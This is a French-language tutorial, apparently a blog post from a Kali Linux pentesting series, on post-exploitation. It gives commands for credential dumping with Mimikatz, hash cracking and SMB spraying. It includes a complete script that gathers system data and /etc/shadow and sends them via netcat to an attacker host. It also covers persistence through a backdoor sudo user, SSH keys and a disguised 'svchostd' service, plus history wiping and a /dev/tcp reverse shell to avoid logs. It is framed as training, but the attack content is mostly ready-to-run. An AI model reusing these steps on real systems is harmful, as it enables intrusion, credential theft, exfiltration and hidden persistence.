“Ok, t’es dedans. Et maintenant, tu fais quoi ?” — Tous les formateurs en cybersécurité, un jour.
Tu as ouvert une porte. Une faille a parlé. Un shell a répondu. Bravo, tu es passé en mode “admin fantôme”.
Maintenant commence la vraie partie : explorer, extraire, pivoter… et parfois, rester planqué.
🧾 Objectifs de la post-exploitation
- Maintenir un accès stable et discret.
- Élever ses privilèges.
- Explorer les ressources.
- Extraire les informations sensibles.
- Préparer un pivot vers d’autres systèmes.
En gros ? Tu deviens un espion numérique en mission. Le James Bond du shell prompté.
🧰 Les outils stars de la post-exploitation sur Kali
🧠 1. Mimikatz (Windows only, sorry penguin lovers)
Permet d’extraire des mots de passe, tickets Kerberos, hash NTLM, et bien plus.
powershellprivilege::debug
sekurlsa::logonpasswords
À lancer en tant qu’administrateur, sinon c’est “access denied”.
🧠 2. BloodHound (+ neo4j)
Visualisation des relations Active Directory et élévation de privilèges via graphe.
SharpHound.exe
côté victime pour collecter les infos.- Visualisation via BloodHound GUI côté Kali.
bashbloodhound
🧠 3. Empire / Powershell-Empire
Framework d’attaque post-exploitation 100% PowerShell.
Parfait pour une persistance Windows discrète avec communication chiffrée.
🧠 4. John The Ripper
Crack de hash offline. Tu as dumpé des hashs ? Tu veux les casser ? Go John.
bashjohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
🧠 5. CrackMapExec
Swiss army knife AD : exécution distante, enumeration SMB, dump, etc.
bashcrackmapexec smb 192.168.1.0/24 -u admin -p 'motdepasse'
🧩 Script de récupération + exfiltration discrète
Un petit script pour faire propre et furtif :
bash#!/bin/bash
TARGET_DIR="/tmp/dump"
mkdir -p $TARGET_DIR
echo "[+] Dump des infos système..."
hostname > $TARGET_DIR/hostname.txt
whoami > $TARGET_DIR/user.txt
ifconfig > $TARGET_DIR/ip.txt
echo "[+] Dump des mots de passe (hashés)..."
cat /etc/shadow > $TARGET_DIR/shadow_dump.txt 2>/dev/null
echo "[+] Création de l’archive..."
tar czf dump.tar.gz $TARGET_DIR
echo "[+] Envoi via netcat..."
cat dump.tar.gz | nc attacker-ip 4444
Côté Kali, il suffit d’écouter :
bashnc -lvnp 4444 > dump_received.tar.gz
🔗 Persistance : quelques astuces de squat
- Ajout d’un nouvel utilisateur avec sudo :
bashsudo useradd -m backdoor -s /bin/bash
sudo passwd backdoor
sudo usermod -aG sudo backdoor
- Ajout de clé SSH dans
~/.ssh/authorized_keys
- Planification via
cron
(ouschtasks
sur Windows) - Service déguisé sous un nom système (
svchostd
est un grand classique)
🧼 Nettoyage (optionnel, mais classe)
Un vrai pentester laisse parfois des traces volontaires, pour l’analyse. Mais si tu veux rester discret :
bashhistory -c && history -w
rm -rf ~/.bash_history
Et surtout, utilise des shells non interactifs (bash -i >& /dev/tcp/…
) pour ne rien logguer du tout.
🧯 En résumé
La post-exploitation est une phase critique : c’est là que tu transformes un accès en prise de contrôle.
Tu ne te contentes pas de rentrer — tu explores, tu prépares l’étape d’après, et tu t’assures qu’on t’oublie pas trop vite.
Prochain arrêt : Nettoyage, OPSEC et sécurité de l’attaquant. Parce que Kali, c’est bien… sauf si toi aussi tu te fais pwned.